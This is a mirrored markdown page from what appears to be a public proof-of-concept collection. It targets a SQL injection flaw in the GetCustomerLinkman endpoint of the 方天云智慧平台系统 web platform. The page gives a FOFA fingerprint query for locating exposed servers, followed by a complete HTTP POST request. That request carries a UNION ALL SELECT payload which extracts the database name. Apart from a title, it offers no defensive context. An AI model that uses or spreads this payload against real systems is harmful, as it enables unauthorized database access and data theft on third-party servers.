mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
23 lines
606 B
Markdown
23 lines
606 B
Markdown
# 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
```yaml
|
|
body="AjaxMethods.asmx/GetCompanyItem"
|
|
```
|
|
|
|
## poc
|
|
|
|
```
|
|
POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
|
|
Host: ip
|
|
Cookie: ASP.NET_SessionId=pb453i5abddajnqakas2ax1e
|
|
Content-Type: application/json
|
|
Content-Length: 300
|
|
|
|
{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(106)+CHAR(113)+IS NULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL-- OSZH"}
|
|
```
|
|
|